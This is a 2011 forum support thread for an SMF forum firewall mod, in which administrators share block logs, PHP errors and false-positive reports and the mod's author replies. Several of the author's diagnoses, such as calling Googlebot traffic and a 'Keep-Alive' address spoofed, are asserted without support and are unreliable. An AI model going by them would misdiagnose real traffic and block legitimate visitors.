highHole: -1 toHoleState: 0 blnBonus: false bonusRatio: 1 arrXPreview: undefined,536,516,500,485,471,458,442,429,416 arrScalePreview: undefined,100,91,83,78,73,69,65,62,59 previewTan: 1.5352 firstPreviewY: 472 previewScaleRatio: 1.013 bitPreviewScale: 1.0035 ledFrames: 0 snd1: [object Object] snd2: [object Object] snd3: [object Object] onEnterFrame: [type Function] onMouseDown: [type Function] onMouseUp: [type Function] onReleaseOutside: [type Function] onKeyDown: [type Function] blnRollOver: false blnEmptyThrow: false arrPreviewBalls: i: 5 ballNumber: 9 blnStars: false arrLedText: gameOver arrLedTime: 60 ballPos: [type Function] throwB: [type Function] roll: [type Function] syncAngle: [type Function] air: [type Function] board: [type Function] topCircle: [type Function] bottomCircle: [type Function] checkHoles: [type Function] toHole: [type Function] hit: [type Function] render: [type Function] rollInterval: [type Function] extCollision: [type Function] topBrdCollision: [type Function] circleBorder3D: [type Function] checkBallToHole: [type Function] internalCollision: [type Function] checkDepth: [type Function] toRollState: [type Function] holesExtCollision: [type Function] gameOver: [type Function] removeMovies: [type Function] printScores: [type Function] advancedRemove: [type Function] speedRestrict: [type Function] adRem: 314 boardCollision: 0 r: 220.651502761895 arctan: -0.32784048108803 tmp: 1 sd: 204.911342772483 blinks: 0 gameScore: 290 value1: 2 myVal1: 4 value2: 9 myVal2: 11 value3: 0 myVal3: 2 value4: NaN myVal4: NaN treID: 249 gy: false vel: 2.09514676517766 tmpVel: -3.15225105415903 dd: 6.54092014971986 arrXCoords: 313,318,317,318,318 arrYCoords: 376,429,472,482,482 gname: skeeballMT gscore: 290 /forum/index.php?act=Arcade&do=newscore HTTP/1.1 Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET4.0C; OfficeLiveConnector.1.5; OfficeLivePatch.1.3; .NET CLR 3.0.30729)

It comes from a game called skeeballMT.swf
Title: Re: Forum Firewall
Post by: THE BRA1N on January 30, 2011, 01:29:24 PM
I am no expert but from looking at the log it appears to me that the reason some of my members are getting DOS bans is because it is counting requests to load attached avatars on a page as simultaneous page requests.

Thus, one thread click turns into several requests in less than a second as it loads attached avatars in particular threads with multiple members using attached av's and it triggers the DOS ban. At least that is my theory. Any merit to this?
Title: Re: Forum Firewall
Post by: butchs on January 30, 2011, 01:52:50 PM
Quote from: quiz_modder on January 30, 2011, 10:59:17 AM
It comes from a game called skeeballMT.swf

Information overload...   :o

Try the small column on the right.  It will tell you the key word that cause the flag.
Title: Re: Forum Firewall
Post by: butchs on January 30, 2011, 01:57:09 PM
Quote from: THE BRA1N on January 30, 2011, 01:29:24 PM
I am no expert but from looking at the log it appears to me that the reason some of my members are getting DOS bans is because it is counting requests to load attached avatars on a page as simultaneous page requests.

I have not been able to duplicate that.   Do not know unless there is a mod doing it or the members are trying to edit avatars all the time.  I know that some of my members had a problem with the feature and I had to whitelist them.  The reason was because of their security software validating every inch of the page.  I guess you will need to set DOS to logging.
Title: Re: Forum Firewall
Post by: quiz_modder on January 30, 2011, 02:56:50 PM
Quote from: butchs on January 30, 2011, 01:52:50 PM
Quote from: quiz_modder on January 30, 2011, 10:59:17 AM
It comes from a game called skeeballMT.swf

Information overload...   :o

Try the small column on the right.  It will tell you the key word that cause the flag.

Request Entity Attack: %5b!
Title: Re: Forum Firewall
Post by: butchs on January 30, 2011, 03:31:45 PM
That code does not match the rest in the post and does not conform to internet standards.  It could be either a user or a program hack.

If I were you I would try playing the game as a non-admin test member and see if you get the error.  If you do NOT get the error then it was the user.  If you do get the error then find another skeeball game form a reputable source like ipdownloads (http://www.ibpdownloads.com/).
Title: Re: Forum Firewall
Post by: quiz_modder on January 30, 2011, 04:24:36 PM
Quote from: butchs on January 30, 2011, 03:31:45 PM
That code doe snot match the rest in the post and does not conform to internet standards.  It could be either a user or a program hack.

If I were you I would try playing the game as a non-admin test member and see if you get the error.  If you do NOT get the error then it was the user.  If you do get the error then find another skeeball game form a reputable source like ipdownloads (http://www.ibpdownloads.com/).

Thanks for the advice, I will give it a go.

Pretty sure I got the game from there, but will double check.
Title: Re: Forum Firewall
Post by: butchs on January 30, 2011, 05:18:13 PM
I looked for it there and was not able to find it.   ::)
Title: Re: Forum Firewall
Post by: butchs on January 30, 2011, 07:08:12 PM
I do not think I did.  My Avatar folder is the "attachment directory". But, I used to see many calls for "action=dlattach" from bad bots that scanned for weaknesses.  Most the time they were trying to break the caputua.  They do not visit me anymore.

This mod has some tests that you will not see elsewhere so it will catch some extra activity.  As a matter of fact when I first created this mod  I saw a whole mess of weird things going on.  You are going to see things that you never expected expressly, if you do not have much protection from your host.  Like I said I blocked 3,000+ visits a week for some time.  Bandwidth was over 8gb, now it is much less.  Much of that is gone now that I am off the spam lists.

All is well since google, and etc are visiting.  I tested this mod for over 6 months before it was released.  Now the mod caches one every now and then and I use it as a country blocker and backup for cloudflare burps.

Who knows there may be some weird configuration I did not test?
Title: Re: Forum Firewall
Post by: butchs on January 30, 2011, 07:25:49 PM
I use the "Avatar_Verification" mod with 100 images which gets a bunch of "action=dlattach" calls .

I consider all input...  You are making a mountain out of a mole hill.  I provided solutions for that post.  Plain and simple, some peoples computer security software will cause DOS errors, in those cases you need to "whitelist" the members and tell them to log in before doing their thing.  If it is an issue in your region then you can turn off the DOS long term ban.  In this case, no security is lost and they will be blocked for the cache duration, then the admin can still look at the log and manually ban for longer time periods.
8)
Title: Re: Forum Firewall
Post by: mutluokul on January 31, 2011, 04:59:25 PM
Quote from: geminisnake on January 18, 2011, 08:50:18 PM
Tried installing the latest version on 1.1.12 and got:

Fatal error: Call to undefined function FFCopyright() in /home/dark/public_html/forum/Sources/Load.php(1733) : eval()'d code on line 373

Haven't been able to work it out yet ...  :)

same problem happened to me. What should I do? What is the solution for this problem? thanks


no problems .. I solve them all

Title: Re: Forum Firewall
Post by: butchs on January 31, 2011, 07:05:19 PM
Quote from: Arantor on January 31, 2011, 06:51:04 AM
Me, I'm doing nothing of the sort, I'm just saying that it might be wise not to jump to conclusions as to how things are being requested, as has been proven here - I did not know you were using the avatar verification mod... though I'm honestly surprised that it's modifying action=dlattach to serve the modified avatar images.

Everything I do is based on facts.

Is your hatred for SMF so great that now you have turned to trolling mod authors?
Title: Re: Forum Firewall
Post by: butchs on January 31, 2011, 07:07:15 PM
Quote from: mutluokul on January 31, 2011, 04:59:25 PM
no problems .. I solve them all

I am happy you fixed it.   :)
Title: Re: Forum Firewall
Post by: butchs on January 31, 2011, 07:34:28 PM
No assumptions were made.  I started the mod over a year ago long before RC4.  This mod was programmed with RC3 & 1.1.11 in mind, then adapted.  Older SMF versions were not considered.  So image checking was done another way.  All your points will be considered.  But for now I have other priorities and other mods to update.  I will get back to it when I have time.

It is one thing to give a point of view, it is another thing to purposely taunt someone.  So I called it correctly.   Why not start on another foot and treat others as you wish to be treated.  :o
Title: Re: Forum Firewall
Post by: butchs on January 31, 2011, 08:25:59 PM
I really do not care what you claim others say.  As far "narrow field of scope" goes...  Please give your ego a rest.  As you admitted you responded with an attitude to test me.  What do you expect, Americans like myself take offense when treated inferior by Europeans.  That is the reason why we broke from England!   :laugh:

Title: Re: Forum Firewall
Post by: butchs on January 31, 2011, 09:21:03 PM
Now please, anyone with real support questions ask away.
Title: Re: Forum Firewall
Post by: ljunatic on February 01, 2011, 12:04:28 AM
I am having trouble with a pair of Blackberry using top members being blocked. I have used the whitelist for all members, but the IP's  rendered by the Blackberry users appear  to be failing the testing.

Forgive me for I am very new to this stuff, and learning as I can, but the only log records that I see referring to the Blackberry users are similar to ones that you thought were poorly written HTTP headers ( BISB_3.5.1.71 ) back in reply #153.

Can you tell me what to look for in the log, or how to whitelist the Blackberry phones?

Edit to add SMF 1.1.12
Title: Re: Forum Firewall
Post by: butchs on February 01, 2011, 05:22:17 AM
I do not get paid to support the mod and only have an hour a day so please provide more information if you will like assistance.  Show me the information from the log.

FYI - The whiltlist is only to prevent being banned in DOS.  If you have members that use poorly written software that does not conform to internet standards and you want them to have access you will need to turn off those portions of the mod.
Title: Re: Forum Firewall
Post by: butchs on February 01, 2011, 07:16:00 PM
All,
Please remember not to turn on blocking until you have tested the mod for at least two days.  It is a good idea to review the "?" help icons while setting up the configuration.
:)
Title: Re: Forum Firewall
Post by: ljunatic on February 01, 2011, 08:13:49 PM
Quote from: butchs on February 01, 2011, 05:22:17 AM
I do not get paid to support the mod and only have an hour a day so please provide more information if you will like assistance.  Show me the information from the log.

These are typical log entries that I assume are the Blackberry smartphones

1503     BISB_3.5.1.71    2011-02-01 19:33:22
   
GET /forum/index.php?board=2.0;wap2 HTTP/1.0      BlackBerry8530/5.0.0.459 Profile/MIDP-2.1 Configuration/CLDC-1.1 VendorID/104 http://www.nebraskafirepower.com/forum/index.php?;wap2    

Invalid ip in Proxy list!

1502         BISB_3.5.1.71    2011-02-01 19:33:14
   
GET /forum/index.php?board=50.0;wap2 HTTP/1.0 BlackBerry8530/5.0.0.459 Profile/MIDP-2.1 Configuration/CLDC-1.1 VendorID/104 http://www.nebraskafirepower.com/forum/index.php?;wap2    

Invalid ip!
Title: Re: Forum Firewall
Post by: butchs on February 01, 2011, 09:03:05 PM
WOW 1503 blocks!   :-*

That is odd because the IP is showing as a UA.  Could be so many things.  Some possibilities:

A blackberrry IP uses the same format as everyone else.  If you like them not to be blocked, you should turn off your "Enable IP Validation" option since the whitelist only prevents DOS tests.

If you can ask one of them to try the following:
1) Yo find the Ip address on the phone selects Options >> Advanced >> Host Routing Table
    Scroll down to the one that is bold, hit menu >> view, it is under the "IP/Ports"
    Note that this changes every time you reboot (dynamic IP) your phone. I think only Sprint (old Nextel) offers static (doesn't change) IP's.
2)  Have them browse http://www.whatismyip.com and report back the address.
3)  Bad program.
4)  Are they using a proxy or WebWorks  or some special internet application?
Title: Re: Forum Firewall
Post by: ljunatic on February 01, 2011, 09:22:22 PM
Thanks for the reply.

I will be seeing a few of these users in person in about 10 days, and I will do some live testing with their phones in hand if I can.

I know that some of the log entries are legit as the user's cookie has valid information. I thought it odd that that information was viewable, but I recognized the username
Title: Re: Forum Firewall
Post by: butchs on February 04, 2011, 08:16:10 PM
No problem.  I sure hope you are seeing member number 2. Because member one is using a proxy and that is most likely a problem..
;D
Title: Re: Forum Firewall
Post by: fireshiro on February 08, 2011, 10:18:04 PM
Quote from: busterone on January 18, 2011, 07:10:20 AM
nope, it just said Hack: Disallowed characters!  without listing the offending character. And nothing in the forum error log.
I just disabled injection test for the time being so they can carry own as usual. 
I will be away for most of the day, but when I return, I can re enable it and see if I can get more info.

How can i disable this mod?
I ask this cause i blocked myself from my forum... Any help?
If its something that needs to be done manualy, please do give me instructions to do so.
I appreciate it.

When i go to my forum this tells me:

QuoteHTTP Error 403 Forbidden
You don't have permission to access

/ on this server.

Your computer may be infected with a virus or a trojan. The Firewall has determined that you: Invalid ip!

anything

If you get this message in error, please contact the ADM1N and provide the date and time of this message.
Title: Re: Forum Firewall
Post by: fireshiro on February 08, 2011, 11:25:34 PM
Quote from: fireshiro on February 08, 2011, 10:18:04 PM
Quote from: busterone on January 18, 2011, 07:10:20 AM
nope, it just said Hack: Disallowed characters!  without listing the offending character. And nothing in the forum error log.
I just disabled injection test for the time being so they can carry own as usual. 
I will be away for most of the day, but when I return, I can re enable it and see if I can get more info.

How can i disable this mod?
I ask this cause i blocked myself from my forum... Any help?
If its something that needs to be done manualy, please do give me instructions to do so.
I appreciate it.

When i go to my forum this tells me:

QuoteHTTP Error 403 Forbidden
You don't have permission to access

/ on this server.

Your computer may be infected with a virus or a trojan. The Firewall has determined that you: Invalid ip!

anything

If you get this message in error, please contact the ADM1N and provide the date and time of this message.



Never mind folks, false alarm xD... I see reading does help than rather posting and waiting for an answer..  O:)
It seems just editing the forumfirewall_enabled setting its veriable to 0 works good  :P when you block yourself as a newb..

Ciao!!
Title: Re: Forum Firewall
Post by: MCK on February 09, 2011, 07:52:08 AM
Great mod. Installed it on an SMF forum I recently took over and golly wiz... Its infested! Now running it on 2 live forums and 1 test forum. Donated $20 for the 2 live forums I'm running it on. Thanks for the hard work. Keep it up!

Follow-up : I very occasionally used to get the following SMF message on my server :

Connection Problems
Sorry, SMF was unable to connect to the database. This may be caused by the server being busy. Please try again later.

After turning the firewall on the occurrence of this problem increased so I stopped the Blocking but am continueing with the Logging for now. My server logs are showing average of 4% to 5% utilization so I don't think this is a chronic server load issue but occasional spike that hits. Actually it feels like a DOS attack if I know one.

Question : Is it possible for the firewall to cause excessive CPU load when Blocking is enabled and say there are numerous concurrent DOS attacks going on? I mean fighting these things must be causing some CPU load too right? Thoughts?

PS - After only couple hours in operation my log now has 998 entries... I am amazed and really concerned. Day in day out. The amount of attempted abuse is just astounding.
Title: Re: Forum Firewall
Post by: MCK on February 09, 2011, 12:53:47 PM
Ideas for further development - Message shown to blocked people could be admin editable.

Additionally the email in there is something I'd like to be able to configure. After installation by default there is an email in that Blocked User message that looks like this :

donotreply~n0spam[at]n0spam~mydomainnamehere~[d0t]~com

I did not see this in the documentation. Perhaps I missed it. Point I'm trying to make is that the users of this mod need to setup a mail account on their server to match this message now as it is. Perhaps this needs to be spelled out in the documentation.

I would also like to suggest that this email address becomes user defined in future updates.

Thanks much for your continued effort. Regards

Title: Re: Forum Firewall
Post by: butchs on February 09, 2011, 08:16:24 PM
Quote from: MCK on February 09, 2011, 07:52:08 AM
Question : Is it possible for the firewall to cause excessive CPU load when Blocking is enabled and say there are numerous concurrent DOS attacks going on? I mean fighting these things must be causing some CPU load too right? Thoughts?

The "Connection Problems" problems are most likely your host.  There is the chance you have an issue with your mysql connection.  The mod writes to the database every-time it blocks someone.  Just to be safe, I would check the SMF settings by running "Repair Settings (http://download.simplemachines.org/?tools)".

If the cache is enabled then the load on your server should be less once it blocks the bad bot.  If you did not do so enable DOS and ban for at least 1 hour to get rid of the fast hitting bots.  After a week or two you should see a decrease in traffic.

My load went down from 8Gb/mo to <1.5GB in the first month using this mod.

Quote from: MCK on February 09, 2011, 12:53:47 PM
donotreply~n0spam[at]n0spam~mydomainnamehere~[d0t]~com

I did not see this in the documentation. Perhaps I missed it. Point I'm trying to make is that the users of this mod need to setup a mail account on their server to match this message now as it is. Perhaps this needs to be spelled out in the documentation.

True, I never mentioned it...

That is on purpose to prevent harvesting of your email address.  It is obfuscating the webmaster address you put in SMF.  The mod replaces @, - and . with text from the language file.  You can Customize it in the ForumFirewall.english.php file.

Just edit the text set by...
$txt['forumfirewall_nospam']
$txt['forumfirewall_dot']
$txt['forumfirewall_dash']


I will advise against turning this back to normal because then the spamers will email you while mere humans will be able to work out what to edit.  But if you insist, and make it look normal, the mods still encodes the email to make it difficult to scalp.  Just not as good as it was.   8)

Quote from: MCK on February 09, 2011, 12:53:47 PM
I would also like to suggest that this email address becomes user defined in future updates.

Go to Admin/Configuration/Server Settings/General/Webmaster Email Address

To edit the address that is obfuscated (scrambled).
Title: Re: Forum Firewall
Post by: butchs on February 09, 2011, 08:20:56 PM
Quote from: MCK on February 09, 2011, 07:52:08 AM
Great mod. Installed it on an SMF forum I recently took over and golly wiz... Its infested! Now running it on 2 live forums and 1 test forum. Donated $20 for the 2 live forums I'm running it on. Thanks for the hard work. Keep it up!
...

PS - After only couple hours in operation my log now has 998 entries... I am amazed and really concerned. Day in day out. The amount of attempted abuse is just astounding.

Thank you for the donation.  No more need for concern.  They no longer have access and will go elsewhere.
Title: Re: Forum Firewall
Post by: MCK on February 10, 2011, 06:05:39 AM
Hi butchs,

Thanks for your kind reply. I appreciate it. I'm working my way through SMF performance tuning guides found on this site and also working with the hosting people to tweak the server. Its a process that often reminds me of a long & painful route canal job... Anyways, will get to the bottom of it.

Appreciate your clearing my email address confusion. I don't see a need to change anything for now due to the obvious reasons you've outlined but its good to know where to go to when needed.

All the best.
Title: Re: Forum Firewall
Post by: MCK on February 10, 2011, 10:21:30 PM
Small follow-up here. As you suggested the firewall hits are getting lesser & lesser. I am now upto 3000+ but rate of increase has slowed down drastically. I can also observe the positive impact of this mod through the logs of Mod httpBL on my forum. While I used to get at least 80 to 90 items in the spammer caught logs before now I get 2-4... Is big success! Thanks for making this happen.

New question : There are certain pre-populated fields on the settings page such as Injection List, XSS Events, Referrer Attacks etc. Would these need to be periodically updated to reflect and catch new attacks etc that get identified? Would you be kind enough to post here if you become aware of such need for updates?

Thanks much!
Title: Re: Forum Firewall
Post by: DarkBlizz on February 11, 2011, 01:28:14 AM
Hey I've been testing your mod for a few days and racked up 3600+ flagged violations.  However it seems to be flagging Google , calling it a DOS Attack.
Quote
3596    66.249.71.141    2011-02-11 01:10:23    GET /Forum2/profile/?area=statistics;u=3116 HTTP/1.1 Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)    DOS Attack!
3595    66.249.71.141    2011-02-11 01:09:23    GET /Forum2/profile/?area=showposts;u=5373 HTTP/1.1 Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)    DOS Attack!

Just wondering why it's getting picked up as a DOS attack when it really isn't and how to not block Google.
Also a majority of the log is filled with "Invalid IPs" called Keep-Alive. Was wondering what that is and are they actual invalid ips or keep alive packets to keep the page up on w/e those users are viewing.
Here's a few logs of those
Quote3582    Keep-Alive    2011-02-11 00:18:59    GET /Forum2/ HTTP/1.0 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FREE; .NET CLR 1.1.4322) http://darkblizz.org/Forum2/    Invalid ip!
3581    Keep-Alive    2011-02-11 00:18:56    GET /Forum2/not-enough-pylons/access-violation-error/ HTTP/1.0 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FREE; .NET CLR 1.1.4322) http://darkblizz.org/Forum2/not-enough-pylons/access-violation-error/    Invalid ip!
3580    Keep-Alive    2011-02-11 00:13:12    GET /Forum2/ HTTP/1.0 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Crazy Browser 2.0.0 Beta 1; .NET CLR 1.0.3705; .NET CLR 1.1.4322) http://darkblizz.org/Forum2/    Invalid ip!
3579    Keep-Alive    2011-02-11 00:03:38    GET /Forum2/index.php HTTP/1.0 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts) http://darkblizz.org/Forum2/index.php    Invalid ip!
3578    Keep-Alive    2011-02-10 23:54:46    GET /Forum2/ HTTP/1.0 Mozilla/5.0 (Windows NT 5.1; U; en) Opera 8.00 http://darkblizz.org/Forum2/    Invalid ip!
3577    Keep-Alive    2011-02-10 23:54:24    GET /Forum2/index.php HTTP/1.0 Mozilla/5.0 (Windows NT 5.1; U; en) Opera 8.00 http://darkblizz.org/Forum2/index.php    Invalid ip!
Title: Re: Forum Firewall
Post by: butchs on February 11, 2011, 02:17:06 AM
Quote from: MCK on February 10, 2011, 10:21:30 PM
New question : There are certain pre-populated fields on the settings page such as Injection List, XSS Events, Referrer Attacks etc. Would these need to be periodically updated to reflect and catch new attacks etc that get identified? Would you be kind enough to post here if you become aware of such need for updates?

Yea.  This is why it is administrator editable,  I was hoping admins would share new list items as they see them.   They cab found at sites that I prefer not to mention here.  In either event, when an update is found all you need to do is type it in the list.
:P
Title: Re: Forum Firewall
Post by: butchs on February 11, 2011, 02:29:36 AM
Quote from: DarkBlizz on February 11, 2011, 01:28:14 AM
Hey I've been testing your mod for a few days and racked up 3600+ flagged violations.  However it seems to be flagging Google , calling it a DOS Attack.

The google ip is easily spoofed.   Chances are they were not really google to begin with. Best way to be sure is to go to "http://www.google.com/support/webmasters/" site and adjust the hit rate and then compare it to your robots.txt and FF trigger.
:)

The  Optimus Brave (http://www.simplemachines.org/community/index.php?topic=422210.0) mod can assist newbies?
:o

If you are still concerned, the mod offers a "User-Agent Whitelist" feature where you can simply enter the UA ie Google in it.  Just read the ?'s.

"Keep-Alive" is a spoofed ip.  :o
Title: Re: Forum Firewall
Post by: MCK on February 11, 2011, 03:42:10 AM
Quote from: butchs on February 11, 2011, 02:17:06 AM
Yea.  This is why it is administrator editable,  I was hoping admins would share new list items as they see them.   They cab found at sites that I prefer not to mention here.  In either event, when an update is found all you need to do is type it in the list.
:P

Thanks for confirming the ability to insert the updates in to the settings window. Would you consider offering settings updates on a periodic or as needed basis to your donating users? Since you know where to look and how to spot the new exploits as you know how to translate these into settings that should go into Forum FireWall I think you are best positioned to distribute these updates when needed. Would you consider this as a service please? As I see it, the FF-Mod is great as is and very capable but I'm afraid over time it will become irrelevant as the script-kiddies will move on to newer & different exploits. Sort of like running an anti-virus tool on your PC with no regular definition updates coming down. Thanks for considering this.
Title: Re: Forum Firewall
Post by: DarkBlizz on February 11, 2011, 12:04:20 PM
alright I'll look into that.  Another question, any idea how to fix this errors:


Quotehttp://darkblizz.org/Forum2/index.php?pretty;action=profile&amp;u=8426
8: Undefined index: host
File: /home/fluffybu/public_html/Forum2/Sources/ForumFirewall.php
Line: 279


276: // Check only if from different hosts
277: $referer_parts = array();
278: $referer_parts = parse_url($forumfirewall_data['referer']);
==>279: if($referer_parts['host'] != forumfirewall_get_env('HTTP_HOST')) {
280: $referer_attack = array();
281: $referer_attack = explode('|', $modSettings['forumfirewall_referer_attack']);
282: @$visitor_referer = queryspecialchars($forumfirewall_data['referer']);
283: foreach ($referer_attack as $attacks) {



Quotehttp://darkblizz.org/Forum2/index.php?action=dlattach;attach=72;type=avatar
8: Undefined offset: 1
File: /home/fluffybu/public_html/Forum2/Sources/ForumFirewall.php
Line: 110

Quotehttp://darkblizz.org/Forum2/index.php?action=dlattach;attach=72;type=avatar
8: Undefined offset: 2
File: /home/fluffybu/public_html/Forum2/Sources/ForumFirewall.php
Line: 107


//  check for dos
if ($dos_cond !== false) {
$time_diff =  '';
Line 107= $time_diff = (time() - $result[2]);

if ($time_diff >= 20) {  //  Min 20 seconds for test
Line 110= if  ((($result[1] + 1)/$time_diff) >= $modSettings['forumfirewall_trigger']) {
//  Fail dos test
$result[0] = '3';
forumfirewall_block($forumfirewall_data, $result);
return;
} } } } }


Quotehttp://darkblizz.org/Forum2/index.php?pretty;action=register2
2: htmlspecialchars() expects parameter 1 to be string, array given
File: /home/fluffybu/public_html/Forum2/Sources/Subs-ForumFirewall.php
Line: 1045


1028: // Insert a new record modified for SMF 2.0 RC2
1029: function forumfirewall_insert($forumfirewall_data, $result) {
1030: global $txt, $modSettings, $db_prefix, $smcFunc;
1031:
1032: if (empty($forumfirewall_data)) return;
1033: if (!is_array($forumfirewall_data)) return;
1034: if (empty($result)) return;
1035:
1036: $request = $headers = $forumfirewall_ip = $request_method = '';
1037: $request_uri = $server_protocol = $user_agent = $referer = '';
1038:
1039:   $forumfirewall_ip = $forumfirewall_data['visitor_ip'];
1040: if (empty($forumfirewall_data['request_entity']))
1041: $request_method = $forumfirewall_data['request_method'];
1042: else {
1043: $request_method = $forumfirewall_data['request_method'];
1044: foreach ($forumfirewall_data['request_entity'] as $h => $v) {
==>1045: request_method .= htmlspecialchars($h) . ": " . htmlspecialchars($v) . "\n\r"; }
1046: unset($v);
1047: }
1048: $request_uri = $forumfirewall_data['request_uri'];
1049: $server_protocol = $forumfirewall_data['server_protocol'];
1050: $user_agent = $forumfirewall_data['user_agent'];


~thanks
Title: Re: Forum Firewall
Post by: butchs on February 11, 2011, 07:13:40 PM
Quote from: DarkBlizz on February 11, 2011, 12:04:20 PM
alright I'll look into that.  Another question, any idea how to fix this errors:

What version FF do you have?
Title: Re: Forum Firewall
Post by: DarkBlizz on February 11, 2011, 07:19:22 PM
1.0.4
Title: Re: Forum Firewall
Post by: butchs on February 11, 2011, 07:57:49 PM
You do not have to post the code.  The mod should work fine but I will add them to the to do list.  Let me know if any of them repeat.
Title: Re: Forum Firewall
Post by: MCK on February 11, 2011, 11:10:57 PM
Hi Butchs, one of my Global Moderators is getting blocked with the following message : Request Entity Attack: %26!

I think he is connecting from his iPhone so I see the chances of his device being infected with malware low. Detail is below. Any thoughts on what I should do to resolve this issue? I am trying the Whitelist group idea in the meanwhile. Thanks for your help.

POSTtopic: 0 subject: History of Roland Guitar Synthesizers icon: xx sel_face: sel_size: sel_color: message: Many GK-13 products mentioned in this brief history of Roland Guitar Synthesizers: Translated by google http://translate.google.com/translate?hl=en&sl=ja&u=http://www.ikebe-gakki.com/web-ikebe/grandy_GR-GK/index.html&prev=/search%3Fq%3Dikebe%2Bgakki%2Bibanez%2Bguitar%26hl%3Den%26client%3Dsafari%26prmd%3Divnsfd&rurl=translate.google.com&twu=1 message_mode: 0 notify: 0 lock: 0 sticky: 0 move: 0 additional_options: 0 f0a59ef24: c90098bec7e35c7a28b76a041e23de20 seqnum: 12532999 /smf/index.php?action=post2;start=0;board=65 HTTP/1.1 Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_2_1 like Mac OS X; en-us) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5 http://www.vguitarforums.com/smf/index.php?action=post;board=65.0   
Title: Re: Forum Firewall
Post by: butchs on February 12, 2011, 06:05:03 AM
He is accessing the site via a third party application "google translate".  The mod was not designed with that in mind.
Title: Re: Forum Firewall
Post by: MCK on February 12, 2011, 06:31:15 AM
Ok. I'll ask him if he can try going direct. I thought he did too but I'll check.

Meanwhile I have another problem. Legit user in New Zealand is coming through with broken IP so he is getting blocked. I tried the whitelist trick but this didn't work since he doesn't get that far into the system. So technically the f/w is doing its job. I just need to find out why he is coming through like this. When he checks his ip with http://www.whatismyip.com/ it is reported properly and it is 222.153.66.36.  He tried connecting with Linux, Win7 etc no change. He tried to reset his router and flush DNS and force new IP and that did not change a thing either.

Have you ever seen something like this? Thanks for any guidance you might have for me.

1.1   
GET /smf/index.php?board=84.0 HTTP/1.1 Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MATP) http://www.vguitarforums.com/smf/index.php?action=post;topic=3099.0;last_msg=19919   
Invalid ip!

1.1   
GET /smf/index.php?board=84.0 HTTP/1.1 Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MATP) http://www.vguitarforums.com/smf/index.php?action=post;topic=3099.0;last_msg=19919   
Invalid ip in Proxy list!

1.1   
POSTuser: gumtown passwrd: cookielength: -1 hash_passwrd: deleted /smf/index.php?action=login2 HTTP/1.1 Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.13) Gecko/20101206 Ubuntu/10.10 (maverick) Firefox/3.6.13 http://www.vguitarforums.com/smf/index.php?board=60.0   
Invalid ip!

1.1   
POSTuser: gumtown passwrd: cookielength: -1 hash_passwrd: deleted /smf/index.php?action=login2 HTTP/1.1 Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.13) Gecko/20101206 Ubuntu/10.10 (maverick) Firefox/3.6.13 http://www.vguitarforums.com/smf/index.php?board=60.0   
Invalid ip in Proxy list!
Title: Re: Forum Firewall
Post by: butchs on February 12, 2011, 06:40:29 AM
It looks like he is using a proxy that is hiding his ip or changing it.  He should try another proxy.
Title: Re: Forum Firewall
Post by: MCK on February 12, 2011, 06:45:16 AM
Ok. Will ask him about it but if that is the case wouldn't http://www.whatismyip.com/ see the same 1.1?
Title: Re: Forum Firewall
Post by: butchs on February 12, 2011, 06:48:35 AM
Nope.  If he is using a proxy that has been miss-configured or set-up to spam he will get blocked.  Please do not try to force me to explain, doing so is a security risk.
Title: Re: Forum Firewall
Post by: MCK on February 12, 2011, 06:50:25 AM
Sure thing. I understand. Will collect as much info as possible and pass on to you via PM if need be. Thanks for your help.
Title: Re: Forum Firewall
Post by: intervention on February 12, 2011, 08:57:42 PM
In the ACP when i go to Forum Firewall>Settings there is a message at the top that says this,
SECURITY RISK: MAGIC_QUOTES ARE ON!
What exactly does this mean and how can i fix it? Any help would be very appreciated!
Title: Re: Forum Firewall
Post by: butchs on February 13, 2011, 02:16:13 AM
The mod detects them and warns about them it is up to you to decide what to do.  Its use is controversial and it can cause slow downs.  EDIT:  SMF RC5 SSI.PHP TRIES TO TURN THEM OFF.

More info here (http://en.wikipedia.org/wiki/Magic_quotes).

"MAGIC_QUOTES" are set in your "php.ini" and are not required by the default SMF package.  If you have the ability, you can turn them off.  Many hosts set them and if you want them off try to be desecrate because some of them are paranoid.
Title: Re: Forum Firewall
Post by: butchs on February 13, 2011, 09:11:03 AM
Upgrade to 2.0 RC5 and 1.1.13 (the lucky old one) and some bug fixes!
:)
Title: Re: Forum Firewall
Post by: MCK on February 13, 2011, 09:14:34 AM
I chose to remain at RC4 and apply the security patch for now. Your new release would still be compatible right?
Title: Re: Forum Firewall
Post by: butchs on February 13, 2011, 09:17:48 AM
Yes.
Title: Re: Forum Firewall
Post by: MCK on February 13, 2011, 09:20:18 AM
Quote from: butchs on February 13, 2011, 09:17:48 AM
Yes.

Thanks for your very prompt reply! Amazing support for your mod. Keep well.
Title: Re: Forum Firewall
Post by: ljunatic on February 13, 2011, 08:32:26 PM
I see the update for 1.1.13 is out. THANKS!


Should I uninstall and reinstall to get the upgrade?
Title: Re: Forum Firewall
Post by: MCK on February 14, 2011, 12:55:31 AM
Seeing some new type of attacks in my logs that I didn't see before.  In case this is of interest.

Request Entity Attack: base64_decode!

Detail : 81.94.196.51
